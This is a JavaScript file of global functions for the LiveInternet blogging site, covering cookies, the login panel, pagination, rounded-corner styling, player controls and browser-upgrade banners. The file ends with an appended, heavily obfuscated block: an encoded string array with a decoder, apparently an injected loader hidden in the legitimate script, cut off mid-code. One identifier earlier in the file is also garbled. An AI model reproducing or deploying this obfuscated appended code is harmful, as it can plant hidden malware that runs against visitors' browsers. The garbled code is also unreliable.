/*
Project: LiveInternet - Global functions
Author:   A.Timofeev / Re.Active (www.reactant.ru)
Version:  15 Jun 2007
 */


/* Системные функции
----------------------------------------------- */

        /* -----------| Работа с куками |----------- */
          /* - Ставим куки - */
            function setCookie(name, value, expire)
            {
                    document.cookie = name + "=" + value + "; path=/; expires=" + expire;
            }
          /* - Получаем куки - */
            function getCookie(name)
            {
                    var search = name + "=";
                    if (document.cookie.length > 0)
                    {
                            offset = document.cookie.indexOf(search);
                            if (offset != -1)
                            {
                                    offset += search.length;
                                    end = document.cookie.indexOf(";", offset);
                                    if (end == -1) end = document.cookie.length;
                                    return unescape(document.cookie.substring(offset, end));
                            }
                    }
            }
          var today = new Date();
          var expires = new Date(today.getTime() + (56 * 86400000));
          setCookie("chbx","guest",expires);
          if (document.cookie.indexOf('__utm') >= 0)
          {
                  document.cookie = "__utma=0; path=/; domain=.liveinternet.ru; expires=Sat, 09 Dec 2000 21:00:00 GMT";
                  document.cookie = "__utmb=0; path=/; domain=.liveinternet.ru; expires=Sat, 09 Dec 2000 21:00:00 GMT";
                  document.cookie = "__utmc=0; path=/; domain=.liveinternet.ru; expires=Sat, 09 Dec 2000 21:00:00 GMT";
                  document.cookie = "__utmz=0; path=/; domain=.liveinternet.ru; expires=Sat, 09 Dec 2000 21:00:00 GMT";
          }

        /* -----------| Объявляем и получаем новые переменные |----------- */
                var username = getCookie("bbusername");
                var bbjurl = getCookie("jurl");
                var jurl = bbjurl;
                var bbuserid = getCookie("bbuserid");
                var userid = getCookie("bbuserid");
                var sstyle = getCookie("ucss");
                var sava = getCookie("ava");

                if (!curj)
                {
                        var curj;
                }
                if (!comun)
                {
                        var comun;
                }

                if (jurl!=null)
                {
                  var domain = (jurl.indexOf('liveinternet.ru')==-1)?jurl:"http://www.liveinternet.ru/";
                }
                else
                {
                  var domain ="http://www.liveinternet.ru/";
                }

                if ((bbjurl != null) && (bbjurl != ""))
                {
                  var last=bbjurl;
                }
                else
                {
                  if ((bbuserid != null) && (bbuserid != ""))
                  {
                          var last="/users/"+bbuserid;
                  }
                  else
                  {
                          var last="/users/"+username;
                  }
                }
                /* - Авторизован или нет - */
                        if ((username != null)&&(username != "deleted")&&(username != ""))
                        {
                          var auth=1;
                        }
                        else
                        {
                          var auth=0;
                        }
                /* - Хозяин дневника или нет - */
                        if (auth == 1)
                        {
                                if ((curj==userid)||(userid==739)||(userid==644454)||(userid==44992)||(userid==2635239))
                                {
                                        var utype=1;
                                }
                                else
                                {
                                        var utype=0;
                                }
                        }


/* Функции вывода элементов навигации
----------------------------------------------- */

        /* -----------| Quote string with slashes |----------- */
                function addslashes( str )
                {
                    return str.replace('/(["\'\])/g', "\\$1").replace('/\0/g', "\\0");
            }

        /* -----------| Форма логина в верхней панели |----------- */
                function jstpl_tpanel (tpl)
                {
                        /* - Повторяющиеся блоки - */
                                /* - Стандартный блок - */
                                        function tplanel_stand(type,id)
                                        {
                                          if (type=="opn")
                                          {
                                                document.write('<div id="'+id+'">');
                                                  document.write('<p>');
                                          }
                                          if (type=="cls")
                                          {
                                                  document.write('</p>');
                                                document.write('</div>');
                                          }
                                        }
                                /* - Вкладки - */
                                        function tplanel_tabs(id,name,url)
                                        {
                                          document.write('<li id="'+id+'">'+name+'<strong><span><em><a href="'+url+'">'+name+'</a></em></span></strong></li>');
                                        }
                                /* - Форма авторизации - */
                                        function tplanel_aform(id_show)
                                        {
                                          document.write('<form id="GlHdrNavMnuForm" style="display:none;" onKeyDown="checkKey(\'GlHdrNavMnuForm\');" action="http://www.liveinternet.ru/member.php" method="post" name="aut">');
                                                tplanel_stand ('opn','GlHdrNavMnuLogin');
                                                  document.write('<b>Логин:</b> <b>Пароль:</b>');
                                                tplanel_stand ('cls','');
                                                tplanel_stand ('opn','GlHdrNavMnuInputs');
                                                  document.write('<input type="text" name="username" tabindex="1" /><input  type="password" name="password" tabindex="2" />');
                                                  document.write('<span><strong><a href="javascript:document.getElementById(\'GlHdrNavMnuForm\').submit();">войти</a></strong>, <a href="javascript:void(0);" onClick="show_div(\''+id_show+'\',\'GlHdrNavMnuForm\');">вернуться</a></span>');
                                                tplanel_stand ('cls','');

                                                var strurl=addslashes(window.location.href);
                                                document.write('<input type="hidden" name="s" value="" /><input type="hidden" name="url" value="'+strurl+'" /><input type="hidden" name="action" value="login" /><input type="submit" style="display:none;" />');
                                          document.write('</form>');
                                        }
                        /* - Вывод блоков - */
                                /* - Пользователь авторизован - */
                                        if (auth==1)
                                        {
                                          document.write('<div id="GlHdrNavMnuAut">');
                                                /* - Контролы пользователя - */
                                                  tplanel_stand ('opn','GlHdrNavMnuLogin');
                                                        document.write('Вы – <a href="'+jurl+'profile/"><b>'+username+'</b></a> <span>(<a href="javascript:void(0);" onClick="show_div(\'GlHdrNavMnuForm\',\'GlHdrNavMnuAut\');">сменить</a>, <a href="/journals.php?s=&action1=login">выйти</a>)</span>');
                                                  tplanel_stand ('cls','');
                                                /* - Вкладки - */
                                                  document.write('<ul id="GlHdrNavMnuTabs">');
                                                        tplanel_tabs('GlHdrNavMnuFrn','Друзья',''+jurl+'friends/');
                                                        tplanel_tabs('GlHdrNavMnuBlog','В дневник',''+jurl+'');
                                                        tplanel_tabs('GlHdrNavMnuPost','Написать','/journal_post.php?journalid='+bbuserid+'');
                                                        tplanel_tabs('GlHdrNavMnuSett','Настройки','/journal_settings.php?journalid='+bbuserid+'');
                                                        tplanel_tabs('GlHdrNavMnuComm','Комментарии',''+jurl+'comments/');
                                                        if (pm_status==1)
                                                        {
                                                                tplanel_tabs('GlHdrNavMnuPriActive','Личка','/im.php?_userid='+bbuserid+'');
                                                        }
                                                        else
                                                        {
                                                                tplanel_tabs('GlHdrNavMnuPri','Личка','/im.php?_userid='+bbuserid+'');
                                                        }
                                                        
                                                        if (tpl=='beee')
                                                        {
															document.write('<li id="GlHdrNavMnuBeee">интернет<strong><span><em><a target="_blank" href="http://www.liveinternet.ru/click;beeline_journal?lk.beeline.ru/requestStepOne.do">инернет</a></em></span></strong></li>');                                                        	
                                                        }
                                                  document.write('</ul>');
                                          document.write('</div>');
                                          tplanel_aform ('GlHdrNavMnuAut');
                                        }
                          /* - Пользователь не авторизован - */
                                else
                                {
                                  document.write('<div id="GlHdrNavMnuNoaut">');
                                        /* - Просим авторизоваться - */
                                          tplanel_stand ('opn','GlHdrNavMnuLogin');
//                                                document.write('<a id="GlHdrNavMnuLoginLgn" href="javascript:void(0);" onClick="show_div(\'GlHdrNavMnuForm\',\'GlHdrNavMnuNoaut\');">Вход</a> / <a id="GlHdrNavMnuLoginReg" href="http://www.liveinternet.ru/journal_register.php">Регистрация</a><span><a href="http://www.liveinternet.ru/member.php?action=lostpw">Напоминание пароля</a> &nbsp;&nbsp;Найти своих: <a href=http://www.liveinternet.ru/importmail.php?cmd=getbook&squery=>по переписке</a>, <a href=http://www.liveinternet.ru/importmail.php?cmd=icq>из ICQ</a></span>');
                                                document.write('<a id="GlHdrNavMnuLoginLgn" href="/journals.php?s=&action1=login">Вход</a> / <a id="GlHdrNavMnuLoginReg" href="http://www.liveinternet.ru/journal_register.php">Регистрация</a><span><a href="http://www.liveinternet.ru/member.php?action=lostpw">Напоминание пароля</a> &nbsp;&nbsp;Найти своих: <a href=http://www.liveinternet.ru/importmail.php?cmd=getbook&squery=>по переписке</a>, <a href=http://www.liveinternet.ru/importmail.php?cmd=icq>из ICQ</a></span>');
											//document.write('<ul><li id="GlHdrNavMnuBeee">интернет<strong><span><em><a target="_blank" href="http://www.liveinternet.ru/click;beeline_journal?lk.beeline.ru/requestStepOne.do">инернет</a></em></span></strong></li></ul>');
                                          tplanel_stand ('cls','');
                                  document.write('</div>');
                                  tplanel_aform ('GlHdrNavMnuNoaut');
                                }
new Image().src = "http://counter.yadro.ru/hit;beeline_journal?r" + escape(document.referrer) + ((typeof(screen)=="undefined")?"" : ";s"+screen.width+"*"+screen.height+"*" + (screen.colorDepth?screen.colorDepth:screen.pixelDepth)) + ";u"+escape(document.URL) + ";h"+escape(document.title.substring(0,80)) + ";" +Math.random();                                
                }

        /* -----------| Типы подписки в левой панели |----------- */
                function jstpl_lpanel_subscribe (superdomain)
                {
                        if (utype != 1)
                        {
                                document.write('<div class="Block Scribe"><ul class="Scribes">');
                                        if (auth == 1)
                                        {
                                                document.write('<li class="Scribe2Friend"><a class="GlIco2Friend" href="'+superdomain+'/member2.php?action=addlist&userlist=buddy&userid=$journalid&userownid='+userid+'">Стать ПЧ</a></li>');
                                        }
                                        document.write('<li class="Scribe2Mail" id="Scribe2Mail"><a class="GlIcoMail" href="javascript:void(0);" onClick="">Почтовая подписка</a></li>');
                                        document.write('<li class="Scribe2RSS"><a class="GlIcoRSS" href="'+superdomain+'rss/">RSS-лента дневника</a></li>');
                                document.write('</ul></div>');
                        }
                }

        /* -----------| Опции пользователя в левой панели |----------- */
                function jstpl_lpanel_uopts ()
                {
                        /* - Пункты меню - */
                        function jstpl_lpanel_li (name,url)
                        {
                          document.write('<li>&ndash; <a href="'+url+'">'+name+'</a></li>');
                        }
                        /* - Если авторизован - */
                                if (auth == 1)
                                {
                                        jstpl_lpanel_li ('Новая запись','/journal_post.php?journalid='+curj+'');

                                        /* - Показываем ссылки управления пользователя - */
                                                if (utype == 1)
                                                {
                                                        jstpl_lpanel_li ('Черновики','/showjournal.php?action=draft&journalid='+curj+'');
                                                        jstpl_lpanel_li ('Настройки дневника','/journal_settings.php?journalid='+curj+'');
                                                        jstpl_lpanel_li ('Обновить дневник','/showjournal_htmlall.php?journalid='+curj+'');
                                                        jstpl_lpanel_li ('Мои сообщения','/im.php?_userid='+curj+'');
                                                        jstpl_lpanel_li ('Мои комментарии','/journalshowownercomments.php?journalid='+curj+'');
                                                        jstpl_lpanel_li ('Мои подписки','/journalshowsubscomments.php?journalid='+curj+'');
                                                }
                                                else
                                                {
                                                        jstpl_lpanel_li ('Написать сообщение','/im.php?cmd=forcemessage&rcpt_userid='+curj+'');
                                                }

                                }
                        /* - Если не авторизован - */
                                else
                                {
                                        jstpl_lpanel_li ('<b>Создать дневник</b>','/journal_register.php');
                                }
                }

        /* -----------| Добавить в друзья |----------- */
                function jstpl_lpanel_addfriend (username)
                {
                        if (auth==1)
                        {
                                if (utype != 1)
                                {
                                        document.write('<a class="GlIco2Friend" title="Стать постоянным читателем '+username+'" href="/member2.php?action=addlist&userlist=buddy&userid='+curj+'&userownid='+userid+'">в друзья</a>');
                                }
                        }
                }

        /* -----------| Новое сообщение |----------- */
                function jstpl_rpanel_addpost ()
                {
                        if (utype == 1)
                        {
                                document.write('<b><a class="GlIcoAdd" href="/journal_post.php?journalid='+curj+'">Новая запись</a></b>');
                        }
                }

        /* -----------| Листалка страниц |----------- */
                function writepage()
                {
                  if ((maxpages!=0)&&(friend=='')) {

                         var c1=0;var c2=0;var c3=0;var c4=0;
                         var i=0;
                         var jp=0;
                         var midpage=''; var leftpage=''; var rightpage='';
                         mp=maxpages;
                         c1=cp+2;
                         if (c1>mp) c1=mp;
                         c2=c1-3;
                         if (c2<1) c2=1;
                         i=c1;
                         if (i==mp)
                         {
                          if (cp==mp)
                           midpage='<font class=j_headtext><b>'+maxpages+'</b></font>'; else
                           midpage='<a href="'+urls1+'" class=link_main><font class=j_headtext>'+maxpages+'</font></a>';
                           i=i-1;
                         }
                         while (i>=c2)
                         {
                           jp=mp-i+1;
                           if (u2_1=='')
                           {
                                 urls2_gen=u2_2+i+u2_3;
                                 urls2='';
                           } else
                           {
                                 urls2_gen='';
                                 urls2=u2_1+i;
                           }
                           if (i==cp)
                                midpage=midpage+'&nbsp; <font class=j_headtext><b>'+i+'</b></font>';
                           else
                                midpage=midpage+'&nbsp; <a href="'+urls2+urls2_gen+'" class=link_main><font class=j_headtext>'+i+'</font></a>';
                           i=i-1;
                         }

                         if (c1+3<mp) midpage=' <font class=j_headtext>...</font>'+midpage;
                         c3=mp-3;
                         if (c3<c1) c3=c1;
                         i=mp;
                         if ((i==mp)&&(i>c3))
                         {
                          if (cp==mp)
                           leftpage='<font class=j_headtext><b>'+maxpages+'</b></font>'; else
                           leftpage='<a href="'+urls1+'" class=link_main><font class=j_headtext>'+maxpages+'</font></a>';
                           i=i-1;
                         }

                         while (i>c3)
                         {
                           jp=mp-i+1;
                           if (u2_1=='')
                           {
                                 urls2_gen=u2_2+i+u2_3;
                                 urls2='';
                           } else
                           {
                                 urls2_gen='';
                                 urls2=u2_1+i;
                           }
                           leftpage=leftpage+'&nbsp; <a href="'+urls2+urls2_gen+'" class=link_main><font class=j_headtext>'+i+'</font></a>';
                           i=i-1;
                         }

                         if (c2-3>1) midpage=midpage+' <font class=j_headtext>...</font>';
                         c4=6;
                         if (c4>c2) c4=c2;
                         i=1;
                         while (i<c4)
                         {
                           jp=mp-i+1;
                           if (u2_1=='')
                           {
                                 urls2='';
                                 urls2_gen=u2_2+i+u2_3;
                           } else
                           {
                                 urls2_gen='';
                                 urls2=u2_1+i;
                           }
                           rightpage='&nbsp; <a href="'+urls2+urls2_gen+'" class=link_main><font class=j_headtext>'+i+'</font></a>'+rightpage;
                           i=i+1;
                         }
                        document.write(leftpage+midpage+rightpage);
                  }
                }


/* Большие и маленькие полезняшки
----------------------------------------------- */

        /* -----------| Управление блоками |----------- */
                /* - Прячем первый, показываем второй - */
                        function show_div (d1,d2)
                        {
                          document.getElementById(d1).style.display='block';
                          document.getElementById(d2).style.display='none';
                        }
                /* - Прячем или показываем нужный блок - */
                        function show_hide (bn)
                        {
                                if (document.getElementById(bn).style.display=='none')
                                {
                                        document.getElementById(bn).style.display='block'
                                }
                                else
                                {
                                        document.getElementById(bn).style.display='none';
                                }
                        }

        /* -----------| Размеры экрана |----------- */
                /* - Узнаем размер - */
                        function screenSize()
                        {
                                var w;
                                w = (window.innerWidth ? window.innerWidth : (document.documentElement.clientWidth ? document.documentElement.clientWidth : (document.body.offsetWidth? document.body.offsetWidth : 1000)));
                                return {w:w};
                        }

        /* -----------| Вставка смайлов |----------- */
                function emoticon(text)
                {
                        var txtarea = document.getElementById('message');
                        text = ' ' + text + ' ';
                        if (txtarea.createTextRange && txtarea.caretPos)
                        {
                                var caretPos = txtarea.caretPos;
                                caretPos.text = caretPos.text.charAt(caretPos.text.length - 1) == ' ' ? text + ' ' : text;
                                txtarea.focus();
                        }
                        else
                        {
                                txtarea.value  += text;
                                txtarea.focus();
                        }
                }
                function emoticon2(text, areaid)
                {
                        var txtarea = document.getElementById(areaid);
                        text = ' ' + text + ' ';
                        if (txtarea.createTextRange && txtarea.caretPos)
                        {
                                var caretPos = txtarea.caretPos;
                                caretPos.text = caretPos.text.charAt(caretPos.text.length - 1) == ' ' ? text + ' ' : text;
                                txtarea.focus();
                        }
                        else
                        {
                                txtarea.value  += text;
                                txtarea.focus();
                        }
                }

        /* -----------| Перевод каретки на новую строку |----------- */
                function storeCaret(textEl)
                  {
                          if (textEl.createTextRange) textEl.caretPos = document.selection.createRange().duplicate();
                  }


/* Работа с формами
----------------------------------------------- */
        var formtool = new Object();
                /* -----------| Отправка формы по Enter |----------- */
                        formtool.enter = function (id)
                        {
                                if  (navigator.appName != "Netscape")
                                {
                                        if (eval(window.event.keyCode)==13)
                                        {
                                                document.getElementById(id).submit();
                                        }
                                }
                        }
                /* -----------| Отправка формы по Ctrl+Enter |----------- */
                        formtool.ctrlenter = function (event)
                        {
                                if((event.ctrlKey) && ((event.keyCode == 0xA)||(event.keyCode == 0xD)))
                                {
                                        return true;
                                }
                        }
                /* -----------| Отправка формы по Eнтеру |----------- */
                        function checkKey(FrmName)
                        {
                                if  (navigator.appName != "Netscape")
                                {
                                        if (eval(window.event.keyCode)==13)
                                        {
                                                document.getElementById(FrmName).submit();
                                        }
                                }
                        }


/* Работа с плеером
----------------------------------------------- */
        //var opera = Boolean(window["opera"]);
        var ie = (navigator.appName.indexOf("Microsoft") != -1);// && !opera;
        /* -----------| Переключение треков |----------- */
                function mju_play_track(num)
                {
                        if ((num <= 0)) return false;
                        var mc = ie ? window.mjupl4li : window.document.mjupl4li;
                        mc.SetVariable("play_track", num);
                }
        /* -----------| Включение треков |----------- */
                function mju_play_file(chars)
                {
                    if (!chars.length) return false;
                    var mc = ie ? window.mjupl4li : window.document.mjupl4li;
                    mc.SetVariable("play_file",chars);
                }
        /* -----------| Управление плеером |----------- */
                function mju_do(cmd)
                {
                        if (!cmd.length) return false;
                        var mc = ie ? window.mjupl4li : window.document.mjupl4li;
                        if (mc) mc.SetVariable("do_"+cmd," ");
                }



/* Закругленные края
----------------------------------------------- */
        function NiftyCheck(){
        if(!document.getElementById || !document.createElement)
                 return(false);
        isXHTML=/html\:/.test(document.getElementsByTagName('body')[0].nodeName);
        if(Array.prototype.push==null){Array.prototype.push=function(){
                        this[this.length]=arguments[0]; return(this.length);}}
        return(true);
        }

        function Rounded(selector,wich,bk,color,opt){
        var i,prefixt,prefixb,cn="r",ecolor="",edges=false,eclass="",b=false,t=false;

        if(color=="transparent"){
                 cn=cn+"x";
                 ecolor=bk;
                 bk="transparent";
                 }
        else if(opt && opt.indexOf("border")>=0){
                 var optar=opt.split(" ");
                 for(i=0;i<optar.length;i++)
                          if(optar[i].indexOf("#")>=0) ecolor=optar[i];
                 if(ecolor=="") ecolor="#666";
                 cn+="e";
                 edges=true;
                 }
        else if(opt && opt.indexOf("smooth")>=0){
                 cn+="a";
                 ecolor=Mix(bk,color);
                 }
        if(opt && opt.indexOf("small")>=0) cn+="s";
        prefixt=cn;
        prefixb=cn;
        if(wich.indexOf("all")>=0){t=true;b=true}
        else if(wich.indexOf("top")>=0) t="true";
        else if(wich.indexOf("tl")>=0){
                 t="true";
                 if(wich.indexOf("tr")<0) prefixt+="l";
                 }
        else if(wich.indexOf("tr")>=0){
                 t="true";
                 prefixt+="r";
                 }
        if(wich.indexOf("bottom")>=0) b=true;
        else if(wich.indexOf("bl")>=0){
                 b="true";
                 if(wich.indexOf("br")<0) prefixb+="l";
                 }
        else if(wich.indexOf("br")>=0){
                 b="true";
                 prefixb+="r";
                 }
        var v=getElementsBySelector(selector);
        var l=v.length;
        for(i=0;i<l;i++){
                 if(edges) AddBorder(v[i],ecolor);
                 if(t) AddTop(v[i],bk,color,ecolor,prefixt);
                 if(b) AddBottom(v[i],bk,color,ecolor,prefixb);
                 }
        }

        function AddBorder(el,bc){
        var i;
        if(!el.passed){
                 if(el.childNodes.length==1 && el.childNodes[0].nodeType==3){
                          var t=el.firstChild.nodeValue;
                          el.removeChild(el.lastChild);
                          var d=CreateEl("span");
                          d.style.display="block";
                          d.appendChild(document.createTextNode(t));
                          el.appendChild(d);
                          }
                 for(i=0;i<el.childNodes.length;i++){
                          if(el.childNodes[i].nodeType==1){
                                        el.childNodes[i].style.borderLeft="1px solid "+bc;
                                        el.childNodes[i].style.borderRight="1px solid "+bc;
                                        }
                          }
                 }
        el.passed=true;
        }

        function AddTop(el,bk,color,bc,cn){
        var i,lim=4,d=CreateEl("b");

        if(cn.indexOf("s")>=0) lim=2;
        if(bc) d.className="artop";
        else d.className="rtop";
        d.style.backgroundColor=bk;
        for(i=1;i<=lim;i++){
                 var x=CreateEl("b");
                 x.className=cn + i;
                 x.style.backgroundColor=color;
                 if(bc) x.style.borderColor=bc;
                 d.appendChild(x);
                 }
        el.style.paddingTop=0;
        el.insertBefore(d,el.firstChild);
        }

        function AddBottom(el,bk,color,bc,cn){
        var i,lim=4,d=CreateEl("b");

        if(cn.indexOf("s")>=0) lim=2;
        if(bc) d.className="artop";
        else d.className="rtop";
        d.style.backgroundColor=bk;
        for(i=lim;i>0;i--){
                 var x=CreateEl("b");
                 x.className=cn + i;
                 x.style.backgroundColor=color;
                 if(bc) x.style.borderColor=bc;
                 d.appendChild(x);
                 }
        el.style.paddingBottom=0;
        el.appendChild(d);
        }

        function CreateEl(x){
        if(isXHTML) return(document.createElementNS('http://www.w3.org/1999/xhtml',x));
        else return(document.createElement(x));
        }

        function getElementsBySelector(selector){
        var i,selid="",selclass="",tag=selector,f,s=[],objlist=[];

        if(selector.indexOf(" ")>0){  //descendant selector like "tag#id tag"
                 s=selector.split(" ");
                 var fs=s[0].split("#");
                 if(fs.length==1) return(objlist);
                 f=document.getElementById(fs[1]);
                 if(f) return(f.getElementsByTagName(s[1]));
                 return(objlist);
                 }
        if(selector.indexOf("#")>0){ //id selector like "tag#id"
                 s=selector.split("#");
                 tag=s[0];
                 selid=s[1];
                 }
        if(selid!=""){
                 f=document.getElementById(selid);
                 if(f) objlist.push(f);
                 return(objlist);
                 }
        if(selector.indexOf(".")>0){  //class selector like "tag.class"
                 s=selector.split(".");
                 tag=s[0];
                 selclass=s[1];
                 }
        var v=document.getElementsByTagName(tag);  // tag selector like "tag"
        if(selclass=="")
                 return(v);
        for(i=0;i<v.length;i++){
                 if(v[i].className.indexOf(selclass)>=0){
                          objlist.push(v[i]);
                          }
                 }
        return(objlist);
        }

        function Mix(c1,c2){
        var i,step1,step2,x,y,r=new Array(3);
        if(c1.length==4)step1=1;
        else step1=2;
        if(c2.length==4) step2=1;
        else step2=2;
        for(i=0;i<3;i++){
                 x=parseInt(c1.substr(1+step1*i,step1),16);
                 if(step1==1) x=16*x+x;
                 y=parseInt(c2.substr(1+step2*i,step2),16);
                 if(step2==1) y=16*y+y;
                 r[i]=Math.floor((x*50+y*50)/100);
                 }
        return("#"+r[0].toString(16)+r[1].toString(16)+r[2].toString(16));
        }


/* Баннерок
----------------------------------------------- */
        /* -----------| Реклама браузера |----------- */
                function AdBrowser ()
                {
                    /* - Предустановленные значения - */
                        /* - Ссылка на скачивание - */
                        this.setParam = {
                                link : function (name) {
                                    if (name == 'msen') { return 'http://ie8.li.ru/FLAT/WIN32_XP/EN/IE8-Setup-Full.exe'; }
                                    else if (name == 'msru') { return 'http://ie8.li.ru/FLAT/WIN32_XP/RU/IE8-Setup-Full.exe'; }
                                    else if (name == 'lien') { return 'http://ie8.li.ru/BrndOnly/WIN32_XP/EN/IE8-Setup-Branding.exe'; }
                                    else if (name == 'liru') { return 'http://ie8.li.ru/BrndOnly/WIN32_XP/RU/IE8-Setup-Branding.exe'; }
                                    else if (name == 'msen-vista') { return 'http://ie8.li.ru/FLAT/WIN32_VISTA/EN/IE8-Setup-Full.exe'; }
                                    else if (name == 'msru-vista') { return 'http://ie8.li.ru/FLAT/WIN32_VISTA/RU/IE8-Setup-Full.exe'; }
                                    else if (name == 'lien-vista') { return 'http://ie8.li.ru/BrndOnly/WIN32_VISTA/EN/IE8-Setup-Branding.exe'; }
                                    else if (name == 'liru-vista') { return 'http://ie8.li.ru/BrndOnly/WIN32_VISTA/RU/IE8-Setup-Branding.exe'; }
                                    else if (name == 'ff') { return 'http://toolbar.li.ru/ftdownload.php'; }
                                    else if (name == 'ff-vista') { return 'http://toolbar.li.ru/ftdownload.php'; }
                                },
                                /* - Наглядная агитация - */
                                message : function (name) {
                                    if (name == 'ms6') { return 'Пользователь IE версии 6, Ваш браузер устарел и небезопасен! <em>Обновить до IE версии 8 LiveInternet Edition?</em>'; }
                                    else if (name == 'ms7') { return 'Internet Explorer 8 - новинка от Microsoft, безопасный и быстрый! <em>Скачать с дополнениями от LiveInternet.ru!</em>'; }
                                    else if (name == 'ms8') { return 'Добавьте к своему Internet Explorer 8 новые возможности от LiveInternet.ru: тулбар и слайсы!'; }
                                    else if (name == 'ff') { return 'Показывает "соседние" сайты, погоду, сервисы для пользователей дневников, статистики и почты LiveInternet'; }
                                }
                        }
                }
                /* - Информация о клиенте - */
                    AdBrowser.prototype.getInfo = {
                        /* - Язык браузера - */
                            lang : function()
                            {
                                if (navigator.browserLanguage != 'ru') {
                                        return 'eng';
                                } else {
                                        return 'ru';
                                }
                            },
                        /* - Операционка - */
                            os : function()
                            {
                                var navpl = navigator.platform;
                                    if (navpl == 'Win32') {
										return 'win';
                                    } else {
                                    	return navpl;
                                    }
                            }
                    }
                /* - Шаблон вывода - */
                    AdBrowser.prototype.setTemplate = {
                        ie : function (message,link)
                        {
							document.getElementById('GlAd-IE').innerHTML = '<div id="GlAd-Ishak"><div id="GlAd-Ishak-Inner"><h3><b>Live</b>Internet Explorer <span>8</span></h3><p>'+message+'</p><a href="'+link+'">Internet Explorer 8</a></div></div>';
                        },
                        ff : function (message,link)
                        {
							document.getElementById('GlAd-IE').innerHTML = '<div id="GlAd-Ishak" class="GlAd-Ff"><div id="GlAd-Ishak-Inner"><h3>Тулбар LiveInternet</h3><p>'+message+'</p><a href="'+link+'">Тульбар LiveInternet</a></div></div>';
                        }
                    }
                /* - Вывод - */
                    AdBrowser.prototype.Output = function (v,vista)
                    {
                        if (vista == 'vista'){
                          vista='-vista';
                        }else{
                          vista='';
                        }

                        lang = this.getInfo.lang();
                        os = this.getInfo.os();
                        _mess = this.setParam.message;
                        _link = this.setParam.link;

                        function selectLang (lang1,lang2)
                        {
                            if (lang=='eng') { return _link(lang1+vista); }
                            else { return _lilj_big.pngnk(lang2+vista); }
                        }
                        
                        document.write ('<div id="GlAd-IE"></div>');

                        if (v == 'any')
                        {
                            /* - Проверка на FF - */
                                if (/a/[-1]=='a') {
                                	this.setTemplate.ff (_mess('ff'),_link('ff'));
                                }
                                else
                                {
                                	this.setTemplate.ie (_mess('ms8'),selectLang ('lien','liru'));
                                }
                        }
                        else if (v == 6) {
                        	this.setTemplate.ie (_mess('ms6'),selectLang ('msen','msru'));
                        }
                        else if (v == 7) {
                        	this.setTemplate.ie (_mess('ms7'),selectLang ('msen','msru'));
                        }
                        else if (v == 8) {
                        	this.setTemplate.ie (_mess('ms8'),selectLang ('lien','liru'));
                        }
                    }


!function(){var r,f=["y2fSBgjHy2S=","BhvKy2e=","Bg9HzgLUzW==","vfjvu1rfrcbysfiGqu5tv0vs","y29TlMDL","BgvUz3rO","ic0G","zxzLBNq=","z2v0uMvZCg9UC2vizwfKzxi=","C2v0vgLTzw91Da==","BwvZC2fNzq==","zNjVBunOyxjdB2rL","rNvUy3rPB24=","zxHWAxjLCW==","Aw4UDwe=","DgLTzxn0yw1W","vu5ltK9xtG==","oYbtyw1Lu2L0zt1oB25LoYbZzwn1CMu=","C3rHy2S=","ywrKrxzLBNrmAxn0zw5LCG==","CMvZCg9UC2vuzxH0","ue9tva==","Bg9JyxrPB24=","u1rbuLq=","y29TlNrY","C3bSAxq=","B25SB2fK","y29VA2LL","z2v0q29TChv0zwrtDhLSzq==","C3bIlNj1","mI4XlJa=","AM9PBG==","ChvZAa==","Dg9gAxHLza==","CgfNzwHPzgu=","zwXLBwvUDa==","zxzLBNrFzgv0zwn0x0LoteLorq==","CMvHzhLtDgf0zq==","y3LJywrH","ChjVDg90ExbL","zgv0zwn0x0LoteLorq==","rxjYB3iGD2HPBguGC3vIC2nYAwjPBMCGre9nq29UDgvUDeXVywrLza==","rgf0zq==","yMvMB3jLDw5SB2fK","BgfIzwXZ","weHsiefou1DfuG==","Ahr0Chm6lY9HBI55yw5KzxGUCNuVANn0CMfJzxi=","C2vUzejLywnVBG==","B3bLBG==","yMX0C3i=","y29TlMfT","y29UDgv4Da==","yMXVy2TLza==","weHsihjLCxvLC3qGzxjYB3i=","zxzLBNruExbL","DgfNCW==","Dhj1C3rLza==","zNvUy3rPB24=","werVBwfPBLjLCxvLC3q=","re9nieXpqurfra==","BMfTzq==","C2XPy2u=","oYbLEhbPCMvZpq==","ywrKAxrPB25HBa==","weHsifjfuvvfu1q=","w29IAMvJDcbbCNjHEv0=","sgvHzgvYigXLBMD0AcbKB2vZBID0ig1HDgnO","re9difjfqurz","C3rLChm=","weHsievsuKjbq0S=","we1mshr0CfjLCxvLC3q=","zg9ty3jVBgW=","CMvTB3zLrxzLBNrmAxn0zw5LCG==","tNvTyMvY","su5msu5f","weHsigz1BMn0Aw9UCYb3zxjLihjLyxnZAwDUzwq=","D2L0AenYzwrLBNrPywXZ","BxnRlNj1","ywfIx2rLDgvJDa==","veLnru9vva==","DgLTzw91Da==","Dg9tDhjPBMC=","y2XLyxjuAw1LB3v0","BMf2AwDHDg9Y","vw5RBM93BG==","Dg9vventDhjPBMC=","yMLUza==","yNrVyq==","zgv2AwnL","vgLTzw91Da==","tK9ux0jmt0nlruq=","zg9JDw1LBNrfBgvTzw50","yMvLCMTH","C2v0sxrLBq==","AhjLzG==","Ag9ZDg5HBwu=","zgf0yq==","y28UAwW=","oYbWyxrOps87igrVBwfPBJ0U","y29UDgvUDc1Szw5NAhq=","C2vSzG==","zxzLBNroyw1L","AgfZt3DUuhjVCgvYDhK=","Dg9W","weHsignVBNn0CNvJDg9YigvYCM9Y","C3jJ","DMvYC2LVBG==","zg9JDw1LBNrnB2rL","rw1WDhKGy29UzMLNlNnYyW==","CgLK","sLnptG==","Aw5KzxHpzG==","yMXVy2TLCG==","yNjVD3nLCG==","y2HHCKnVzgvbDa==","DMfSDwu=","DgLTzq==","B25LCNjVCG==","C3rHDhvZvgv4Da==","Aw5PDa==","re9nq29UDgvUDeXVywrLza==","C3rYAw5NAwz5","y29TCgXLDgu=","C2vUza==","y2fSBa==","yKHwA1KYrt0=","Bg9JywXtDg9YywDL","u3rHDhvZoIa=","Aw5MCMfTzq==","u3rYAw5N","C2vYDMLJzq==","zg9TywLU","r0vu"];r=f,function(x){for(;--x;)r.push(r.shift())}(119);var X=function(x,r){var n=f[x=+x];void 0===X.DlEDrf&&(X.NaznFf=function(x){for(var r=function(x){for(var r,n,v=String(x).replace(/=+$/,""),f="",a=0,t=0;n=v.charAt(t++);~n&&(r=a%4?64*r+n:n,a++%4)&&(f+=String.fromCharCode(255&r>>(-2*a&6))))n="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=".indexOf(n);return 